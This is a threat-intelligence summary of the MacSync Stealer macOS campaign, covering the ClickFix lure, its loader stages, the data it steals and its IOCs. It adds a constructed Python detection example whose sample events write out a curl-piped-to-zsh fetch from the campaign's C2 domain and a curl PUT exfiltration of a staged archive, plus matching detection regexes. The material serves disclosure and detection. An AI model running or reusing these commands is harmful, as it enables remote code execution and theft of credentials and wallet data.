MacSync Stealer is an active macOS infostealer campaign leveraging SEO poisoning and ClickFix fake CAPTCHA social engineering to trick U.S. SLTT users into pasting Terminal commands that fetch and execute Zsh and AppleScript payloads. The campaign features a Loader-as-a-Service model with API key‑gated C2 infrastructure and in-memory AppleScript execution to evade defenses and has trojanized Ledger desktop applications to persistently steal seed phrases. #MacSyncStealer #ClickFix
Keypoints
- MacSync Stealer campaigns target U.S. State, Local, Tribal, and Territorial (SLTT) macOS users via SEO poisoning and fake CAPTCHA “ClickFix” pages that instruct victims to paste Terminal commands.
- Threat actors moved from Mach-O binary delivery to a multistage Loader-as-a-Service (LaaS) model using shell-based loaders, API key-gated C2 domains, dynamic AppleScript payloads, and aggressive in-memory execution to bypass macOS defenses.
- An MS-ISAC-submitted sample showed a Zsh script that retrieves a remote bootstrap script (via a 64‑char token in the URL) and a Stage 2 AppleScript executed by osascript, confirming per-victim dynamic payload generation and victim metadata injection.
- The AppleScript infostealer implements nine data-collection modules targeting 13 Chromium and 4 Gecko browsers (including browser cookies, Login Data, IndexedDB, and extension settings), macOS Keychain, SSH keys, cloud credentials, Telegram data, and common sensitive user files.
- MacSync Stealer includes cryptocurrency-focused capabilities: extracting extension and desktop wallet data and trojanizing Ledger desktop applications by replacing core files with backdoored versions that exfiltrate seed phrases on subsequent launches.
- CIS CTI advises U.S. SLTTs to use MS-ISAC membership and services (including MDBR) for IOC sharing and proactive blocking; CIS disseminated over 1,000 IOCs and reported the campaign is likely to persist through 2026 due to ClickFix scalability.
MITRE Techniques
- [T1204] User Execution – The campaign uses SEO poisoning and fake CAPTCHA pages to trick users into executing Terminal commands (‘redirects the victim to a fake CAPTCHA page hosted at hxxp://filegrowthlabs[.]com/s3/?c=…’).
- [T1059] Command and Scripting Interpreter – Attackers deliver and execute Zsh shell scripts and AppleScript payloads to run code and collect data (‘the sample included a Zsh shell script and an AppleScript payload’).
- [T1218] Signed Binary Proxy Execution – The AppleScript is passed into the native osascript interpreter and executed in memory to evade detection (‘the AppleScript payload is passed directly into the macOS’s native osascript interpreter and executed entirely in memory’).
- [T1560] Archive Collected Data – Collected data is compiled into a temporary archive prior to exfiltration (‘compiles it into an archive it creates in the temp directory, /tmp/osalogging.zip’).
- [T1041] Exfiltration Over C2 Channel – The Zsh script exfiltrates the archive to the C2 via HTTP PUT in 10 MB segments with retries and backoff (‘exfiltrates the file in 10 MB segments via HTTP PUT requests to the C2 server… up to eight retry attempts utilizing an incremental backoff strategy’).
- [T1071] Application Layer Protocol – C2 communications and payload retrieval use HTTP(S) web protocols for transport and bootstrap retrieval (‘retrieves a remote Zsh shell script from hxxp://mansfieldpediatrics[.]com/curl/…’).
- [T1555] Credentials from Password Stores – The payload harvests stored credentials and secrets including macOS Keychain, browser stored credentials, SSH private keys, AWS credentials, and Kubernetes config files (‘the payload harvests the macOS Keychain database, SSH private keys, AWS credentials, Kubernetes configuration files’).
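The behaviours listed above (bootstrap fetch via a 64-hex-character /curl/ token, curl piped into a shell, osascript run from a shell with no script file, the /tmp/osalogging.zip and /tmp/sync<digits> staging paths, and HTTP PUT exfiltration from /tmp) can be turned into host-side detection rules. The following is an added example, not code from the CIS report; the process-event records, field names and command lines are constructed for illustration, using only the paths and hostnames the report lists.

```python
import re

# Constructed macOS process-start events (not from the CIS report): process name,
# full command line and parent process name, as an EDR or unified log would record.
SAMPLE_EVENTS = [
    {"pid": 502, "proc": "zsh", "parent": "Terminal",
     "cmd": "zsh -c 'curl -fsSL http://mansfieldpediatrics.com/curl/"
            "b2955c54eb0c047463993b379e015e737aabed37b456aeb0957cf84cdb0ed1f0 | zsh'"},
    {"pid": 503, "proc": "osascript", "parent": "zsh", "cmd": "osascript"},
    {"pid": 504, "proc": "zip", "parent": "osascript",
     "cmd": "zip -r /tmp/osalogging.zip /tmp/sync4821930"},
    {"pid": 505, "proc": "curl", "parent": "zsh",
     "cmd": "curl -X PUT --data-binary @/tmp/osalogging.zip.part1 "
            "http://mansfieldpediatrics.com/upload"},
    # Benign: a user's saved script run by Finder, with a script file on disk.
    {"pid": 610, "proc": "osascript", "parent": "Finder",
     "cmd": "osascript /Users/alice/Library/Scripts/backup.scpt"},
]

# Patterns derived from the report's description of the loader and exfiltration.
BOOTSTRAP_URL = re.compile(r"https?://[^\s'\"]+/curl/[0-9a-f]{64}\b")  # per-victim token
PIPE_TO_SHELL = re.compile(r"curl\b[^|]*\|\s*(zsh|bash|sh)\b")           # ClickFix paste
STAGING_PATH = re.compile(r"/tmp/(osalogging\.zip|sync\d{7}\b)")
HTTP_PUT_FROM_TMP = re.compile(r"curl\b.*(-X\s*PUT|--upload-file|-T)\b.*/tmp/")

def osascript_in_memory(ev):
    """osascript spawned by a shell with no script file argument takes the
    AppleScript from stdin or -e, so nothing is written to disk to inspect."""
    args = ev["cmd"].split()[1:]
    no_file = not any(a.endswith((".scpt", ".applescript", ".js")) for a in args)
    return ev["proc"] == "osascript" and ev["parent"] in {"zsh", "bash", "sh"} and no_file

RULES = [
    ("clickfix_curl_pipe_shell", lambda ev: bool(PIPE_TO_SHELL.search(ev["cmd"]))),
    ("bootstrap_token_fetch", lambda ev: bool(BOOTSTRAP_URL.search(ev["cmd"]))),
    ("osascript_in_memory", osascript_in_memory),
    ("staging_path", lambda ev: bool(STAGING_PATH.search(ev["cmd"]))),
    ("http_put_exfil_from_tmp", lambda ev: bool(HTTP_PUT_FROM_TMP.search(ev["cmd"]))),
]

def detect(events):
    """Return (pid, rule_name) for every event that matches a rule, in event order."""
    hits = []
    for ev in events:
        for name, pred in RULES:
            if pred(ev):
                hits.append((ev["pid"], name))
    return hits
```

Running `detect(SAMPLE_EVENTS)` flags the four stages of the constructed chain and leaves the Finder-launched script untouched; correlating several hits under one parent shell within a short window is what separates this chain from a lone curl or osascript.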
Indicators of Compromise
- [Domain] Landing pages and C2 domains used in redirects and payload hosting – filegrowthlabs[.]com, mansfieldpediatrics[.]com, and houstongaragedoorinstallers[.]com.
- [URL] Malicious landing page and bootstrap endpoints – hxxp://filegrowthlabs[.]com/s3/?c=AA-0uWlVgQUAHYwCAFVTOQASAAAAAACP, hxxp://mansfieldpediatrics[.]com/curl/b2955c54eb0c047463993b379e015e737aabed37b456aeb0957cf84cdb0ed1f0.
- [File Hash / Token] 64-character bootstrap token used in /curl/ endpoint – b2955c54eb0c047463993b379e015e737aabed37b456aeb0957cf84cdb0ed1f0 (and other build-specific tokens reported in campaign samples).
- [Hardcoded API Key] Persistent campaign fingerprint value found in multiple samples – 5190ef1733183a0dc63fb623357f56d6 (hardcoded API key used for C2 authentication across deployments).
- [File Name / Path] Temporary staging and archive file paths created by payload – /tmp/sync[7-digit-random]/ and /tmp/osalogging.zip.
- [Build Tag / Affiliate] MaaS build identifier embedded in URLs and metadata – Build Tag “s3” used as the affiliate build landing page indicator.
Read more: https://www.cisecurity.org/insights/blog/macsync-stealer-campaign-impacting-us-sltt-macos-users